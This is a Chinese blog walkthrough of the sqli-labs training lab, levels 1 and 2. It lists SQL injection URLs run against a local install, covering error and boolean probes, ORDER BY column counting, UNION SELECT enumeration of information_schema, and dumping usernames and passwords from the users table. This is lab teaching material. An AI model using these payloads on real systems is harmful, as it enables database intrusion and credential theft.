Sql-labs-master 打靶练习

已于 2024-07-24 10:16:15 修改
阅读量774 收藏 23
点赞数 20
文章标签: oracle 数据库 sql 安全 web安全
于 2024-07-23 01:43:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a96482/article/details/140622941
版权
一.less1
1.判断是否存在sql注入

1)加单引号引起报错

http://127.0.0.1/sqli-labs-master/Less-1/?id=1'

2)布尔判断

http://127.0.0.1/sqli-labs-master/Less-1/?id=1'and 1=1--+   //1=1为真,所以页面正常显示

http://127.0.0.1/sqli-labs-master/Less-1/?id=14'and 1=2--+  //1=2结果为假,所以页面显示异常

2.判断数据库当前查询表有几列

1)

http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 1 --+ //order by 1

判断是否存在1列时,页面显示正常,说明存在1列

2)

http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 2 --+ //order by 2

判断是否存在2列时,页面显示正常,说明存在2列

3)

http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 3 --+ //order by 3

判断是否存在3列时,页面显示正常,说明存在3列

http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 4 --+ //order by 4

判断是否存在4列时,页面显示异常,说明存在3列

3.已经判断完数据库查询表有3列,那么联合查询3列,查出数据库名
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 --+

//联合查询3列,把前面的id值改成不存在的,页面显示我们查询出来的2和3,2和3被叫做回显位置,那么我们可以在2和3的地方进行sql注入

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,version(),database() --+

//联合查询database(),查出当前网站使用的数据库名 version(),user()

4.联合查询通过内置库查询当前数据库使用的表
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

5.联合查询通过内置库查询当前数据库使用的表中的列
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+

6.查询表中所有的数据
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(id,'~',username,'~',password) from users--+

二、less2

1.判断是否存在sql注入

1)加单引号引起报错

http://127.0.0.1/sqli-labs-master/Less-2/?id=1'

2)布尔判断

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=1--+   //1=1为真,所以页面正常显示

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=2--+  //1=2结果为假,所以页面显示异常

2.判断数据库当前查询表有几列

1)

http://127.0.0.1/sqli-labs-master/Less-2/?id=1' order by 1 --+ //order by 1

判断是否存在1列时,页面显示正常,说明存在1列

2)

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 order by 2 --+ //order by 2

判断是否存在2列时,页面显示正常,说明存在2列

3)

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 order by 3 --+ //order by 3

判断是否存在3列时,页面显示正常,说明存在3列

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 order by 4 --+ //order by 4

判断是否存在4列时,页面显示异常,说明存在3列

3.已经判断完数据库查询表有3列,那么联合查询3列,查出数据库名
http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,3 --+

//联合查询3列,把前面的id值改成不存在的,页面显示我们查询出来的2和3,2和3被叫做回显位置,那么我们可以在2和3的地方进行sql注入

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,version(),database() --+

//联合查询database(),查出当前网站使用的数据库名 version(),user()

4.联合查询通过内置库查询当前数据库使用的表
http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

5.联合查询通过内置库查询当前数据库使用的表中的列
http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+

6.查询表中所有的数据
http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(id,'~',username,'~',password) from users--+

一同吃泥
关注
  • 20
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
sql-labs通关技巧
03-01
SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
oracle库PASSWORD_VERSIONS 对应的加密方式
最新发布
文牧之的博客
08-02 167
【代码】oracle库PASSWORD_VERSIONS 对应的加密方式。
简单的 mongoDB 学习
qq_19342829的博客
07-31 497
mongodb入门学习整理
社区养老服务小程序的设计
Karen198的博客
07-31 515
管理员账户功能包括:系统首页,个人中心,用户管理,服务人员管理,服务产品管理,服务预约管理,服务状态管理,服务退订管理,活动管理,视频管理。主要技术:Java,Spring,mybatis,mysql,jquery,html。服务器:SpringBoot自带 apache tomcat。微信端账号功能包括:系统首页,服务产品,活动,视频,我的。JDK版本:Java JDK1.8。数据库可视化工具: navicat。数据库版本: mysql5.7。开发工具:IDEA(推荐)开发系统:Windows。
二进制部署k8s集群之master节点和etcd数据库集群(上)
zx52306的博客
07-30 1182
【代码】二进制部署k8s集群之master节点和etcd数据库集群(上)
MySQL备份与恢复
m0_74860678的博客
08-01 452
在生产环境中,数据的安全性至关重要任何数据的丢失都可能产生严重的后果造成数据丢失的原因程序错误人为操作错误运算错误磁盘故障灾难(如火灾、地震)和盗窃# 开启二进制日志功能[mysqld]# 重启服务# 有 mysql-bin.000001 就代表成功。
杂谈 | windows批处理脚本 | 配置项目环境变量
zwcslj的博客
07-31 1255
命令回显功能是指在运行命令或脚本时,系统将命令的执行过程和结果显示在屏幕上,使用户能够实时地看到命令的执行情况。通常,当命令回显功能打开时,在执行每一步命令时,系统将会显示执行的命令本身以及对应的结果,从而帮助用户了解命令的执行过程,排查可能出现的问题。关闭回显时,命令提示符不会出现在“命令提示符”窗口中。若要再次显示命令提示符,请键入 echo on。
互联网医院系统源码与医保购药APP开发的完整技术指南
meihusdk的博客
07-30 352
开发过程中需注重数据安全、系统性能、用户体验等多个方面,确保系统的高效稳定运行和良好用户体验。希望这篇技术指南能为开发者提供有益的参考,助力互联网医疗健康行业的发展。
实战:MySQL数据同步神器之Canal
为无为,事无事,味无味。
08-02 674
canal [kə'næl],译意为水道/管道/沟渠,主要用途是基于 MySQL 数据库增量日志解析,提供增量数据订阅和消费。项目起源于阿里巴巴内部对于跨机房数据同步的需求,通过解析MySQL的二进制日志(Binary Log),Canal能够捕获并推送数据库的变更事件,满足了诸如数据库镜像、实时备份、索引实时维护等多种业务场景的需求。GitHub - alibaba/canal: 阿里巴巴 MySQL binlog 增量订阅&消费组件。
【iOS】——持久化
m0_73974920的博客
07-30 1072
因为plist文件不能够保存自定义对象。如果一个字典中保存有自定义对象,如果把这个对象写入到文件当中,它是不会生成 plist文件的。如果对象是NSString、NSDictionary、NSArray、NSData、NSNumber等类型,可以直接用NSKeyedArchiver进行归档和恢复。
Switchover和Failover切换方案(实战)
一个只求实际的程序猿
08-02 706
-检查主库下switchover_status字段,如果值为"session active"或者"to standby", 则主数据库角色可以切换为备库角色。=======================检查=================================--两个节点各执行2次。2.--备库切换为主库(切换可在1节点执行,启停需所有集群节点都执行)3.--主库切换为备库(切换1节点执行,启停需所有集群节点都执行)4.--获取主、备库上的信息以及保护模式(主备库执行)
已经10岁的K8S,在很多方面仍需努力
u012516914的专栏
07-28 373
/ K8S 已经 10 岁了,但仍然有许多方面要继续努力 /Kubernetes 于 2014 年 6 月推出,自那时起,它在推广云原生应用设计和支持更多微服务部署方面发挥了巨大作用。容器部署的增长非常迅速,而 Kubernetes 对于企业管理这些部署至关重要——根据 CNCF 上一份报告的调查结果,84% 的组织正在使用或评估 Kubernetes,而 66% 的潜在和实际消费者在生产中使用 ...
手把手教你安装AoiAWD
swordcloud_xm的博客
07-29 1337
AoiAWD 是一个由Aodzip(安恒信息 海特实验室研究员、HAC战队成员)维护的一个针对于CTF AWD模式的开源项目。专为比赛设计,便携性好,低权限运行的EDR系统。任何人都可以在 GNU AGPL-3.0 许可下使用该项目和分享该项目的源码。AoiAWD地址:https://github.com/DasSecurity-HatLab/AoiAWD。
添加索引导致微服务异常
07-29 1168
执行DDL时,最好使用ONLINE选项,随着oracle版本升级,online状态下可执行的DDL逐步增加,大部分普通DDL上,可以使用ONLINE选项,例如。而在新增索引的时候会有TM锁,而该表又有大量的insert、update等,因此会对这些dml语句造成阻塞。1、对大表新增索引尽量停业务,就算加上online不会造成阻塞,但对性能也有影响,特别是这种性能敏感的系统。2、在新增索引的时候加online参数,而online产生的TM锁时间比较短。加了online后,可以以非独占的方式创建和删除索引。
Redis高可用
扮瘦人的博客
08-01 346
Redis高可用学习
sql-labs安装
08-28
对于安装 SQL-Labs,您可以按照以下步骤进行操作: 1. 首先,您需要确保您的系统上已经安装了 LAMP 或者 WAMP 等 Web 服务器环境,以及 MySQL 数据库。 2. 下载 SQL-Labs 的源代码。您可以从 GitHub 上的项目页面(https://github.com/Audi-1/sqli-labs)下载最新的 ZIP 文件,并将其解压缩到您的 Web 服务器的文档根目录中。 3. 在 MySQL 数据库中创建一个新的数据库,用于存储 SQL-Labs 的数据。您可以使用以下命令在 MySQL 命令行中创建一个新数据库: ``` CREATE DATABASE sqli; ``` 4. 导入 SQL-Labs 的数据库结构。进入到您解压缩的 SQL-Labs 文件夹中,找到 `db-structure.sql` 文件,并使用以下命令导入数据库结构: ``` mysql -u your_username -p sqli < db-structure.sql ``` 替换 `your_username` 为您的 MySQL 用户名,并输入密码进行验证。 5. 配置 SQL-Labs。进入 SQL-Labs 文件夹中的 `db.php` 文件,按照注释中的提示修改数据库连接信息,包括主机名、用户名、密码和数据库名称。 ``` $host = 'localhost'; $user = 'your_username'; $password = 'your_password'; $db = 'sqli'; ``` 6. 启动 Web 服务器,并在浏览器中访问 SQL-Labs。在浏览器中输入 `http://localhost/sql-labs/`,您应该能够看到 SQL-Labs 的登录页面。 现在,您已经成功安装并配置了 SQL-Labs。请确保仔细阅读项目的文档,了解如何正确使用和利用 SQL-Labs 的功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值